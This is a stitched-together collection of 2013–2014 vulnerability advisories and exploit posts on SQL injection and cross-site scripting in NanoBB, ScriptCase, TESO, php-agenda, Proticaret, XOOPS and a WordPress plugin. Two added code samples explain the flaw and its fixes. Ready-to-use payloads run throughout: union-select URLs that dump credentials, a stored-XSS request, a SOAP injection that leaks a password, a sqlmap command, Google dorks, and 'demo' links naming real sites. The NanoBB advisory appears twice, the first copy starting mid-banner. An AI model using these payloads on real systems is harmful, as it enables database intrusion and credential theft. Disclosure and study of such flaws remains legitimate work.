    / XXXXXX /\______(
   / XXXXXX /         
  / XXXXXX /
 (________(           
  `------'
 
##############################################
VULNERABILITY: SQL Injection (Category,Topic)
##############################################
 
/category.php (LINE: 7-16)
 
-----------------------------------------------------------------------------
LINE 7-16:
 
$sql = "SELECT
      cat_id,
      cat_name,
      cat_description
    FROM
      categories
    WHERE
      cat_id = " . mysql_real_escape_string($_GET['id']);
 
$result = mysql_query($sql);
-----------------------------------------------------------------------------
 
 
/topic.php (LINE: 11-19)
 
-----------------------------------------------------------------------------
LINE 11-19:
 
$sql = "SELECT
      topic_id,
      topic_subject
    FROM
      topics
    WHERE
      topics.topic_id = " . mysql_real_escape_string($_GET['id']);
 
$result = mysql_query($sql);
-----------------------------------------------------------------------------
 
 
#####################################################
DESCRIPTION FOR SQL INJECTION
#####################################################
 
An attacker can execute arbitrary SQL statements on the database server through this vulnerability.
User-tainted data is used when building the query that is executed on the database management system (DBMS).
The id is passed through mysql_real_escape_string(), but that function only escapes quotes, backslashes, NUL and
a few control characters; since the value is concatenated into a numeric comparison without surrounding quotes,
a payload that contains none of those characters (such as the POCs below) reaches the DBMS unchanged.
The attacker can inject their own SQL syntax and thus read, insert or delete database entries, or attack the
underlying operating system, depending on the query, DBMS and configuration.
 
POC:
 

http://target/nano/category.php?id=9%20and%201%20div%202%20union%20select%201,concat%28user%28%29,0x3a3a,database%28%29,0x3a3a,version%28%29%29,3


http://target/nano/topic.php?id=10%20and%201%20div%200%20union%20select%201,concat%28user%28%29,0x3a3a,database%28%29,0x3a3a,version%28%29%29
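Added example, not NanoBB's code: a Python 3 model of the category.php query that shows why escaping alone does not help in a numeric context, next to the two fixes that do (a bound parameter, or casting to int as PHP's intval() would). sqlite3 stands in for MySQL, so the POC's MySQL-only "1 div 2" is replaced by a plain "and 0"; the table contents, PAYLOAD and function names are constructed for the example.

```python
import sqlite3

# Same shape as the POC above, without quotes, backslashes or NUL bytes.
PAYLOAD = "9 and 0 union select user_id, user_name, user_pass from users"


def mysql_real_escape_string(s):
    """Python model of the characters PHP's mysql_real_escape_string() rewrites."""
    table = {"\\": "\\\\", "'": "\\'", '"': '\\"', "\0": "\\0",
             "\n": "\\n", "\r": "\\r", "\x1a": "\\Z"}
    return "".join(table.get(c, c) for c in s)


def setup():
    """In-memory stand-in for the forum database (constructed rows)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE categories(cat_id INTEGER, cat_name TEXT, cat_description TEXT)")
    con.execute("INSERT INTO categories VALUES (9, 'General', 'General discussion')")
    con.execute("CREATE TABLE users(user_id INTEGER, user_name TEXT, user_pass TEXT)")
    con.execute("INSERT INTO users VALUES (1, 'admin', 'hash-placeholder')")
    return con


def category_vulnerable(con, raw_id):
    """As in category.php: escaped, then concatenated into a numeric comparison."""
    sql = ("SELECT cat_id, cat_name, cat_description FROM categories WHERE cat_id = "
           + mysql_real_escape_string(raw_id))
    return con.execute(sql).fetchall()


def category_bound(con, raw_id):
    """Fix 1: a bound parameter is data, whatever characters it contains."""
    return con.execute(
        "SELECT cat_id, cat_name, cat_description FROM categories WHERE cat_id = ?",
        (raw_id,)).fetchall()


def category_cast(con, raw_id):
    """Fix 2 (PHP intval()): force the integer type before the query is built."""
    try:
        cat_id = int(raw_id)
    except ValueError:
        return []
    return con.execute(
        "SELECT cat_id, cat_name, cat_description FROM categories WHERE cat_id = %d" % cat_id
    ).fetchall()


if __name__ == "__main__":
    con = setup()
    print("escaped only :", category_vulnerable(con, PAYLOAD))   # leaks the users row
    print("bound        :", category_bound(con, PAYLOAD))        # nothing
    print("cast to int  :", category_cast(con, PAYLOAD))         # nothing
```

mysql_real_escape_string(PAYLOAD) returns PAYLOAD unchanged, which is the whole point: the escaping was designed for values inside quotes, and the query never puts quotes around the id.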

 
 
#####################################################
VULNERABILITY: Cross Site Scripting (Create_topic.php)
#####################################################
 
/create_topic.php (LINE: 106-119)
 
-----------------------------------------------------------------------------
LINE 106-119:
 
$topicid = mysql_insert_id();
 
        $sql = "INSERT INTO
              posts(post_content,
                  post_date,
                  post_topic,
                  post_by)
            VALUES
              ('" . mysql_real_escape_string($_POST['post_content']) . "',
                  NOW(),
                  " . $topicid . ",
                  " . $_SESSION['user_id'] . "
              )";
        $result = mysql_query($sql);
-----------------------------------------------------------------------------
 
 
#####################################################
DESCRIPTION FOR CROSS SITE SCRIPTING
#####################################################
 
An attacker can execute arbitrary HTML/JavaScript code in the client's browser context through this vulnerability.
User-tainted data is embedded into the HTML output by the application and rendered by the user's browser, allowing
an attacker to embed and render malicious code. Since the post content is stored, every user who views the topic
runs the injected code. This can lead to website defacement, phishing, cookie theft and session hijacking.
 
POC:
 
POST /nano/create_topic.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/nano/create_topic.php
Cookie: __utma=111872281.1795322081.1369810583.1369810583.1369810583.1; __utmz=111872281.1369810583.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); lang=en_US; PHPSESSID=gbf1u3p49bid3b1g4cnhuplco5
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 98
 
topic_subject=Test+XSS&topic_cat=7&post_content=%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E
 
 
################################################################################################################
 Greetz      : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
################################################################################################################

ScriptCase SQL Injection

#----------------------------------------------------------------------#
#                                                                      #
#           1010101010101010101010101010101010101010101010101          #
#           0      __                 _  __                 0          #
#           1    /'__`\             /' \/\ \                1          #
#           0   /\_\ \ \   __   __ /\_, \ \ \               0          #
#           1   \/_/_\_<_ /\ \ /\ \\/_/\ \ \ \              1          #
#           0     /\ \ \ \\ \ \_/ /   \ \ \ \ \____         0          #
#           1     \ \____/ \ \___/     \ \_\ \_____\        1          #
#           0      \/___/   \/__/       \/_/\/_____/        0          #
#           1                                               1          #
#           0             >> Dr.3v1l                        0          #
#           1             >> 0WebSecurity.IR                1          #
#           0                                               0          #
#           1  [+] E-Mail  : B.Devils.B@gmail.com           1          #
#           0  [+] Y!      : Teacher_3v1l                   0          #
#           1                                               1          #
#           0  ###########################################  0          #
#           1  I'm 3v1l member from Black_Devils B0ys Team  1          #
#           0  ###########################################  0          #
#           1                                               1          #
#           0101010101010101010101010101010101010101010101010          #
#                                                                      #
#----------------------------------------------------------------------#
# [~] Exploit Title   : ScriptCase SQL Injection vulnerable            #
# [~] Date            : 2013                                           #
# [~] Author          : Hossein Hezami ( Dr.3v1l )                     #
# [~] Software        : http://www.scriptcase.net                      #
# [~] Version         : ALL Versions                                   #
# [~] E-Mail          : Teacher_3v1l@yahoo.com , B.Devils.B@gmail.com  #
# [~] Site            : 0WebSecurity.ir                                #
# [~] Tested on       : Windows XP , Windows 7 , Windows 8             #
# [~] Google Dork     : inurl:"/scelta_categoria.php?categoria="       #
#======================================================================#
# [+] SQL I Exploit   :                                                #
#                                                                      #
#     [Target]/[path]/scelta_categoria.php?categoria=[SQLi]            #
#                                                                      #
#----------------------------------------------------------------------#
# [+] Demo :                                                           #
#                                                                      #
#     http://www.grossetoannunci.it/scelta_categoria.php?categoria=14  #
#     http://www.livorno-annunci.com/scelta_categoria.php?categoria=14 #
#                                                                      #
#----------------------------------------------------------------------#
# [+] Note :                                                           #
#                                                                      #
#     This is a simple sql injection ;)                                 #
#                                                                      #
#----------------------------------------------------------------------#
#                                                                      #
# [+] Contact Me :                                                     #
#                                                                      #
#     Teacher_3v1l@yahoo.com                                           #
#     Black_Devils.B0ys@yahoo.com                                      #
#     Teacher.3v1l@live.com                                            #
#     B.Devils.B@gmail.com                                             #
#     Twitter.com/Doctor_3v1l                                          #
#     IR.LinkedIN.com/IN/Hossein3v1l                                   #
#                                                                      #
#======================================================================#

TESO Web 2.0 SQL Injection

=============================================
TESO web 2.0 SQL Injection / Blind SQL Injection
=============================================
 
I. VULNERABILITY
-------------------------
#Title: TESO SQLInjection/ Blind SQLInjection
#Vendor:http://www.tesoweb.com
#Author:Juan Carlos García (@secnight)
#Follow me
http://www.highsec.es
http://hackingmadrid.blogspot.com
http://blogs.0verl0ad.com
Twitter: @secnight
Facebook: https://www.facebook.com/pages/ETHICAL-HACKING-Y-OL%C3%89-by-the-Face-WhiteHat/172393869485449?ref=tn_tnmn
 
 
 
II. DESCRIPTION
-------------------------
 
TESO is a powerful, free tool that lets you take control of your money and your portfolio, both at home and in your business.
 
Its main features are:
 
Privacy and confidentiality. TESO stores no personal information and asks for none at registration.
You guard your own keys, and no one can associate them with the accounts stored in TESO.
 
Bank reconciliation. TESO lets you load bank statements to compare (reconcile) them with its own accounting.
 
Investment securities. TESO fetches the latest quotes for more than 1000 European and American
securities, values your portfolio and calculates realized and unrealized capital gains. You can
manage your portfolio in TESO without keeping full accounts of your money.
 
It has been established that the application is not secure, it is not private, and the confidentiality of its data is at risk.
 
III. PROOF OF CONCEPT
-------------------------
 
##Blind SQLInjection
 
Affected items
 
/default.asp 
 
Attack details
 
URL encoded GET input lang was set to -1' or '3'='3
GET /default.asp?lang=-1%27%20or%204%20%3d%20%275 HTTP/1.1

http://www.tesoweb.es/default.asp?lang=-1%27%20or%204%20%3d%20%275

 
##SQLinjection
 
Affected items
 
/default.asp 
 
Attack details
 
URL encoded GET input lang was set to 1'
Error message found: 
 
<font face="Arial" 
size=2>Syntax error in string in query expression '((idioma = '1'') and (activa = True))
order by fecha desc'.</font>
 
GET /default.asp?lang=1%27 HTTP/1.1
 

http://www.tesoweb.es/default.asp?lang=1%27

 
 
IV. SOLUTION
-------------------------
 
The script should filter metacharacters from user input.
It is absolutely vital to sanitize user input to ensure
that it does not contain dangerous content, whether aimed at the
SQL server or at the HTML itself. One's first idea is to strip
out "bad stuff", such as quotes, semicolons or escape characters,
but this is a misguided approach: though it is easy to point
out some dangerous characters, it is much harder to point out all of them.
 
 
V. CREDITS
-------------------------
 
This vulnerability has been discovered
by Juan Carlos García(@secnight)
 
 
VII. LEGAL NOTICES
-------------------------
 
The Author accepts no responsibility for any damage
caused by the use or misuse of this information.

NanoBB 0.7 Cross Site Scripting / SQL Injection

# Exploit Title   : NanoBB 0.7 Multiple Vulnerabilities
# Date            : 10 June 2013
# Exploit Author  : CWH Underground
# Site            : www.2600.in.th
# Vendor Homepage : http://nanobb.sourceforge.net/
# Software Link   : heanet.dl.sourceforge.net/project/nanobb/v0.7.zip
# Version         : 0.7
# Tested on       : Window and Linux
 
  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O .. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /         
  / XXXXXX /
 (________(           
  `------'
 
##############################################
VULNERABILITY: SQL Injection (Category,Topic)
##############################################
 
/category.php (LINE: 7-16)
 
-----------------------------------------------------------------------------
LINE 7-16:
 
$sql = "SELECT
      cat_id,
      cat_name,
      cat_description
    FROM
      categories
    WHERE
      cat_id = " . mysql_real_escape_string($_GET['id']);
 
$result = mysql_query($sql);
-----------------------------------------------------------------------------
 
 
/topic.php (LINE: 7-16)
 
-----------------------------------------------------------------------------
LINE 11-19:
 
$sql = "SELECT
      topic_id,
      topic_subject
    FROM
      topics
    WHERE
      topics.topic_id = " . mysql_real_escape_string($_GET['id']);
 
$result = mysql_query($sql);
-----------------------------------------------------------------------------
 
 
#####################################################
DESCRIPTION FOR SQL INJECTION
#####################################################
 
An attacker might execute arbitrary SQL commands on the database server through this vulnerability.
User-tainted data is used when building the database query that is executed on the database management system (DBMS).
An attacker can inject their own SQL syntax and thereby read, insert or delete database entries, or attack the underlying operating system,
depending on the query, DBMS and configuration.
 
POC:
 

http://target/nano/category.php?id=9%20and%201%20div%202%20union%20select%201,concat%28user%28%29,0x3a3a,database%28%29,0x3a3a,version%28%29%29,3


http://target/nano/topic.php?id=10%20and%201%20div%200%20union%20select%201,concat%28user%28%29,0x3a3a,database%28%29,0x3a3a,version%28%29%29

 
 
#####################################################
VULNERABILITY: Cross Site Scripting (Create_topic.php)
#####################################################
 
/category.php (LINE: 106-119)
 
-----------------------------------------------------------------------------
LINE 106-119:
 
$topicid = mysql_insert_id();
 
        $sql = "INSERT INTO
              posts(post_content,
                  post_date,
                  post_topic,
                  post_by)
            VALUES
              ('" . mysql_real_escape_string($_POST['post_content']) . "',
                  NOW(),
                  " . $topicid . ",
                  " . $_SESSION['user_id'] . "
              )";
        $result = mysql_query($sql);
-----------------------------------------------------------------------------
 
 
#####################################################
DESCRIPTION FOR CROSS SITE SCRIPTING
#####################################################
 
An attacker might execute arbitrary HTML/JavaScript code in the client's browser context through this vulnerability.
User-tainted data is embedded into the HTML output by the application and rendered by the user's browser, which allows an attacker
to embed and render malicious code. A crafted link leads to execution of this code in another user's browser
context when the link is clicked. This can lead to local website defacement, phishing, cookie theft and session hijacking.
 
POC:
 
POST /nano/create_topic.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/nano/create_topic.php
Cookie: __utma=111872281.1795322081.1369810583.1369810583.1369810583.1; __utmz=111872281.1369810583.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); lang=en_US; PHPSESSID=gbf1u3p49bid3b1g4cnhuplco5
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 98
topic_subject=Test+XSS&topic_cat=7&post_content=%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E
 
 
################################################################################################################
 Greetz      : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
################################################################################################################

Simple PHP Agenda 2.2.8 SQL Injection

=============================================
WEBERA ALERT ADVISORY 02
- Discovered by: Anthony Dubuissez
- Severity: high
- CVE Request – 05/06/2013
- CVE Assign – 06/06/2013
- CVE Number – CVE-2013-3961
- Vendor notification – 06/06/2013
- Vendor reply – 10/06/2013
- Public disclosure – 11/06/2013
=============================================
 
I. VULNERABILITY
-------------------------
iSQL in php-agenda <= 2.2.8
 
II. BACKGROUND
-------------------------
Simple Php Agenda is « a simple agenda tool written in PHP with MySQL backend. An agenda tool accessible everywhere
there's internet ».
 
III. DESCRIPTION
-------------------------
Php-Agenda 2.2.8 and lower versions contain a flaw that allows an authenticated user to perform an SQL injection (iSQL) attack. This flaw exists
because the application does not properly sanitize parameters (it relies only on the mysql_real_escape_string() function) in the
edit_event.php file. This allows an attacker to craft a URL that dumps information from the database contents.
A valid account is required.
 
IV. PROOF OF CONCEPT
-------------------------
dumping login and password of the first admin
iSQL:

http://server/edit_event.php?eventid=1%20union%20select%201,2,3,username,password,6,7,8,9%20from%20users%20where%20userlevel=9%20limit%200,1

 
V. BUSINESS IMPACT
-------------------------
iSQL: sensitive information can be obtained through the vulnerability, which can escalate to a complete administrator account compromise.
 
VI. SYSTEMS AFFECTED
-------------------------
Php-Agenda 2.2.8 and lower versions
 
VII. SOLUTION
-------------------------
Sanitize the GET/POST parameters correctly (do not rely on the mysql_real_escape_string() function alone).
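Both NanoBB (category.php, topic.php) and php-agenda (edit_event.php) concatenate the escaped value into an unquoted numeric comparison, so mysql_real_escape_string() has nothing to escape and the payloads above need no quote characters at all. The example below is added here and is not code from either project: it reproduces that pattern against an in-memory SQLite database through PDO and shows the fix, validating the id as an integer and binding it as a parameter. It assumes PHP with pdo_sqlite, and uses addslashes() as a stand-in for mysql_real_escape_string(), which needs a live MySQL connection and was removed in PHP 7.

```php
<?php
// Added example, not NanoBB or php-agenda code. Shows why escaping cannot protect
// an unquoted numeric comparison and how a validated, bound parameter does.
// Runs offline against an in-memory SQLite database; schema and rows are constructed.
declare(strict_types=1);

$pdo = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$pdo->exec('CREATE TABLE categories (cat_id INTEGER PRIMARY KEY, cat_name TEXT)');
$pdo->exec("INSERT INTO categories VALUES (1, 'general'), (2, 'staff-only')");

// Stand-in for mysql_real_escape_string(): backslash-escapes quotes and a few
// control characters, nothing else. The real function needs a live MySQL
// connection and was removed in PHP 7, so addslashes() models it here.
function escape_like_mysql(string $value): string
{
    return addslashes($value);
}

// The pattern from category.php / edit_event.php: escaped value, but no quotes
// around it, so the escaping has nothing to act on.
function vulnerable_query(string $id): string
{
    return 'SELECT cat_id, cat_name FROM categories WHERE cat_id = ' . escape_like_mysql($id);
}

function vulnerable_row_count(PDO $pdo, string $id): int
{
    return count($pdo->query(vulnerable_query($id))->fetchAll(PDO::FETCH_ASSOC));
}

// Hardened version: the id must parse as an integer, and it is sent to the DBMS
// as a bound parameter rather than as query text.
function fetch_category(PDO $pdo, string $rawId): ?array
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT);
    if ($id === false) {
        return null; // a real handler would answer 400 Bad Request here
    }
    $stmt = $pdo->prepare('SELECT cat_id, cat_name FROM categories WHERE cat_id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed input with no quote characters: escaping leaves it unchanged and
// the WHERE clause now matches every row instead of one.
$tainted = '1 OR 1=1';
echo "escaped value : ", escape_like_mysql($tainted), "\n";
echo "built query   : ", vulnerable_query($tainted), "\n";
echo "rows returned : ", vulnerable_row_count($pdo, $tainted), "\n";

// The same input never reaches the DBMS through the hardened path, while a
// well-formed id still returns its single row.
var_dump(fetch_category($pdo, $tainted));
var_dump(fetch_category($pdo, '2'));
```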
 
VIII. REFERENCES
-------------------------
http://www.webera.fr/advisory-02-php-agenda-isql-exploit/
 
IX. CREDITS
-------------------------
The vulnerability has been discovered by Anthony Dubuissez (anthony (dot) dubuissez (at) webera (dot) fr).
 
X. DISCLOSURE TIMELINE
-------------------------
June 05, 2013: Vulnerability acquired by Webera
June 06, 2013: Sent to vendor.
June 10, 2013: Vendor replies; bugfix released in version 2.2.9.
June 11, 2013: Advisory published and sent to lists.
 
XI. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied « as-is » with no warranties or guarantees of fitness of use
or otherwise. Webera accepts no responsibility for any damage caused by the use or misuse of this information.
 
XII. FOLLOW US
-------------------------
You can follow Webera, news and security advisories at:
On twitter: @erathemass

Proticaret E-Commerce Script 3.0 SQL Injection

Document Title:
============
Proticaret E-Commerce Script v3.0 >= SQL Injection
 
Release Date:
===========
13 Nov 2014
 
Product & Service Introduction:
========================
Proticaret is a free e-commerce script.
 
Abstract Advisory Information:
=======================
BGA Security Team discovered an SQL injection vulnerability in Proticaret E-Commerce Script v3.0
 
Vulnerability Disclosure Timeline:
=========================
20 Oct 2014    :    Contact with Vendor
20 Nov 2014    :    Vendor Response
June 26, 2014 :    Patch Released
13 Nov 2014    :    Public Disclosure
 
Discovery Status:
=============
Published
 
Affected Product(s):
===============
Promist Bilgi İletişim Teknolojileri A.Ş
Product: Proticaret E-commerce Script v3.0 >=
 
Exploitation Technique:
==================
Remote, Unauthenticated
 
Severity Level:
===========
Critical
 
Technical Details & Description:
========================
SQL Injection
 
Proof of Concept (PoC):
==================
Proof of Concept
 
Request:
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
   <soapenv:Header/>
   <soapenv:Body>
      <tem:GetProductCodes>
         <!--Optional:-->
         <tem:Code>1' from Users where (select top 1 password from users where userId=101)>1-    -</tem:Code>
         <!--Optional:-->
         <tem:StartWith>?</tem:StartWith>
      </tem:GetProductCodes>
   </soapenv:Body>
</soapenv:Envelope>
 
Response:
 
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
   <soap:Body>
      <soap:Fault>
         <faultcode>soap:Server</faultcode>
 
         <faultstring>System.Web.Services.Protocols.SoapException: Server was unable to process request. ---> System.Data.SqlClient.SqlException: Conversion failed when converting the nvarchar value 'secretpassword' to data type int.
   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)
   at System.Data.SqlClient.SqlInternalConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)
   at System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj, Boolean callerHasConnectionLock, Boolean asyncClose)
   at System.Data.SqlClient.TdsParser.TryRun(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj, Boolean& dataReady)
   at System.Data.SqlClient.SqlDataReader.TryHasMoreRows(Boolean& moreRows)
   at System.Data.SqlClient.SqlDataReader.TryReadInternal(Boolean setTimeout, Boolean& more)
   at System.Data.SqlClient.SqlDataReader.Read()
   at ASPNetPortal.ProductService.GetProductCodes(String Code, String StartWith)
   --- End of inner exception stack trace ---</faultstring>
         <detail/>
      </soap:Fault>
   </soap:Body>
</soap:Envelope>
 
 
Solution Fix & Patch:
================
Apply the patch for v3.0
 
Security Risk:
==========
The risk of the vulnerability above is estimated as critical.
 
Credits & Authors:
==============
Bilgi Güvenliği Akademisi
 
Disclaimer & Information:
===================
The information provided in this advisory is provided as it is without any warranty. BGA disclaims all warranties, either expressed or implied,
including the warranties of merchantability and capability for a particular purpose. BGA or its suppliers are not liable in any case of
damage, including direct, indirect, incidental, consequential loss of business profits or special damages.
 
Domain:    www.bga.com.tr
Social:        twitter.com/bgasecurity
Contact:    bilgi@bga.com.tr
 
Copyright © 2014 | BGA


XOOPS 2.5.6 SQL Injection

=============================================
MGC ALERT 2014-003
- Original release date: March 6, 2014
- Last revised:  November 18, 2014
- Discovered by: Manuel Garcia Cardenas
- Severity: 7,1/10 (CVSS Base Score)
=============================================
 
I. VULNERABILITY
-------------------------
Blind SQL Injection in XOOPS <= 2.5.6
 
II. BACKGROUND
-------------------------
XOOPS is an acronym of "eXtensible Object Oriented Portal System". Though
started as a portal system, it later developed into a web application
framework. It aims to serve as a web framework for use by small, medium and
large sites, through the installation of modules.
 
III. DESCRIPTION
-------------------------
It is possible to inject SQL code through the variable "selgroups" on the page
"admin.php". This bug was found while using the portal with authentication. To
exploit the vulnerability it is only necessary to use version 1.0 of the HTTP
protocol to interact with the application.
 
IV. PROOF OF CONCEPT
-------------------------
The following URL and parameter have been confirmed to suffer from
blind SQL injection.
 
/xoops/htdocs/modules/system/admin.php?fct=users&selgroups=1
 
Exploiting with SQLMap:
 
python sqlmap.py -u "http://192.168.244.129/xoops/htdocs/modules/system/admin.php?fct=users&selgroups=1" --cookie="PHPSESSID=kjrjempn828cgrv6k8tjp4fs60;xoops_user=0" -p "selgroups" --technique=TB --dbs
 
[INFO] POST parameter 'selgroups' is 'MySQL > 5.0.11 AND time-based blind
(comment)' injectable
[INFO] POST parameter 'selgroups' is 'OR boolean-based blind - WHERE or
HAVING clause (MySQL comment)' injectable
 
[INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5
[INFO] fetching database names
[INFO] fetching number of databases
[INFO] resumed: 4
[INFO] resumed: information_schema
[INFO] resumed: mysql
[INFO] resumed: phpmyadmin
[INFO] resumed: xoops
available databases [4]:
[*] information_schema
[*] mysql
[*] phpmyadmin
[*] xoops
 
V. BUSINESS IMPACT
-------------------------
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also possible.
 
VI. SYSTEMS AFFECTED
-------------------------
XOOPS <= 2.5.6
 
VII. SOLUTION
-------------------------
Update to version 2.5.7
 
VIII. REFERENCES
-------------------------

http://xoops.org/
http://xoops.org/modules/news/article.php?storyid=6658

 
IX. CREDITS
-------------------------
This vulnerability has been discovered and reported
by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com).
 
X. REVISION HISTORY
-------------------------
January 21, 2014 1: Initial release
 
XI. DISCLOSURE TIMELINE
-------------------------
March 5, 2014 1: Vulnerability acquired by Manuel Garcia Cardenas
March 5, 2014 2: Send to vendor
June 17, 2014 3: New version that includes patched code
http://xoops.org/modules/news/article.php?storyid=6658
November 18, 2014 4: Sent to lists
 
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
 
XIII. ABOUT
-------------------------
Manuel Garcia Cardenas
Pentester


WordPress SP Client Document Manager 2.4.1 SQL Injection

Vulnerability title: Multiple SQL Injection in SP Client Document Manager plugin
Plugin: SP Client Document Manager
Vendor: http://smartypantsplugins.com
Product: https://wordpress.org/plugins/sp-client-document-manager/
Affected version: version 2.4.1 and previous version
Fixed version: N/A
Google dork: inurl:wp-content/plugins/sp-client-document-manager
Reported by: Dang Quoc Thai - thai.q.dang (at) itas (dot) vn
Credits to ITAS Team - www.itas.vn
 
 
::DESCRIPTION::
 
Multiple SQL injection vulnerabilities have been found and confirmed within the software as an anonymous user. A successful attack could allow an anonymous attacker to access information such as usernames and password hashes stored in the database. The following URLs and parameters have been confirmed to suffer from SQL injection:
 
Link 1:
 
POST /wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=email-vendor HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://target.org/wordpress/?page_id=16
Cookie: wordpress_cbbb3ecca6306be6e41d05424d417f7b=test1%7C1414550777%7CxKIQf1812x9lfyhuFgNQQhmDtojDdEnDTfLisVHwnJ6%7Cc493b6c21a4a1916e2bc6076600939af5276b6feb09d06ecc043c37bd92a0748; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_cbbb3ecca6306be6e41d05424d417f7b=test1%7C1414550777%7CxKIQf1812x9lfyhuFgNQQhmDtojDdEnDTfLisVHwnJ6%7C7995fe13b1bbe0761cb05258e4e13b20b27cc9cedf3bc337440672353309e8a3; bp-activity-oldestpage=1
Connection: keep-alive
Content-Length: 33
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 
vendor_email[]=<SQL Injection>
 
 
Vulnerable file:/wp-content/plugins/sp-client-document-manager/classes/ajax.php
Vulnerable code: (Line: 1516 -> 1530)
    function email_vendor()
    {
        global $wpdb, $current_user;
        if (count($_POST['vendor_email']) == 0) {
            echo '<p style="color:red;font-weight:bold">' . __("Please select at least one file!", "sp-cdm") . '</p>';
        } else {
            $files = implode(",", $_POST['vendor_email']);
            echo "SELECT *  FROM " . $wpdb->prefix . "sp_cu  WHERE id IN (" . $files . ")" . "\n";
            $r     = $wpdb->get_results("SELECT *  FROM " . $wpdb->prefix . "sp_cu  WHERE id IN (" . $files . ")", ARRAY_A);
 
 
 
Link 2: http://target.org/wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=download-project&id=<SQL Injection>
 
GET /wp-content/plugins/sp-client-document-manager/ajax.php?function=download-project&id=<SQL Injection> HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=4f7eca4e8ea50fadba7209e47494f29c
Connection: keep-alive
 
Vulnerable file:/wp-content/plugins/sp-client-document-manager/classes/ajax.php
Vulnerable code: (Line: 1462 -> 1479)
 
function download_project()
    {
        global $wpdb, $current_user;
        $user_ID     = $_GET['id'];
        $r           = $wpdb->get_results("SELECT *  FROM " . $wpdb->prefix . "sp_cu   where pid = $user_ID  order by date desc", ARRAY_A);
        $r_project   = $wpdb->get_results("SELECT *  FROM " . $wpdb->prefix . "sp_cu_project where id = $user_ID  ", ARRAY_A);
        $return_file = "" . preg_replace('/[^\w\d_ -]/si', '', stripslashes($r_project[0]['name'])) . ".zip";
        $zip         = new Zip();
        $dir         = '' . SP_CDM_UPLOADS_DIR . '' . $r_project[0]['uid'] . '/';
        $path        = '' . SP_CDM_UPLOADS_DIR_URL . '' . $r_project[0]['uid'] . '/';
        //@unlink($dir.$return_file);
        for ($i = 0; $i < count($r); $i++) {
            $zip->addFile(file_get_contents($dir . $r[$i]['file']), $r[$i]['file'], filectime($dir . $r[$i]['file']));
        }
        $zip->finalize(); // as we are not using getZipData or getZipFile, we need to call finalize ourselves.
        $zip->setZipFile($dir . $return_file);
        header("Location: " . $path . $return_file . "");
    }
 
Link 3: http://target.org/wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=download-archive&id=<SQL Injection>
 
GET /wp-content/plugins/sp-client-document-manager/ajax.php?function=download-archive&id=<SQL Injection> HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
